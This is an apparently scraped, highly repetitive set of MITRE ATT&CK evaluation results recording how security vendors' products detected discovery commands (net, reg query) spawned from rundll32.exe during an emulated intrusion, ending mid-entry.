A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) and a suspicious indicator that system configuration info was queried. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched cmd.exe executing net with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Permission Groups Discovery) as well as the tag Administrator Enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating net localgroup execution was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with an alert for Enumeration of Administrator Account (tainted by a parent Malicious File Detection). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the net) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Permission Groups Discovery) as well as the tag Administrator Enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with an alert for Enumeration of Administrator Account (tainted by a parent Malicious File Detection). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery) [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the net) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (cmd.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Permission Groups Discovery) as well as the tag Administrator Enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The alert was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with an alert for Enumeration of Administrator Account (tainted by a parent Malicious File Detection). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated the Shockwave domain's Domain Administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Techniques (Permission Groups Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command as well as the execution of net1.exe as the execution of an enumeration command using net or net1. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
An "IIOC" module called "Enumerates domain administrators" was generated and provided enrichment. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net.exe) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the net) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Owner/User Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (cmd.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Reconnaissance Tool and Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. One condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Owner/User Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net1.exe executing with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Enrichment
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry within the process tree showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The process tree view showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran reg) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because reg query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing reg.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because the attacker queried a registry key that contains system policy configurations. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe indicating that a sensitive registry key was accessed, possibly as part of reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the reg) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing reg with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running reg) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
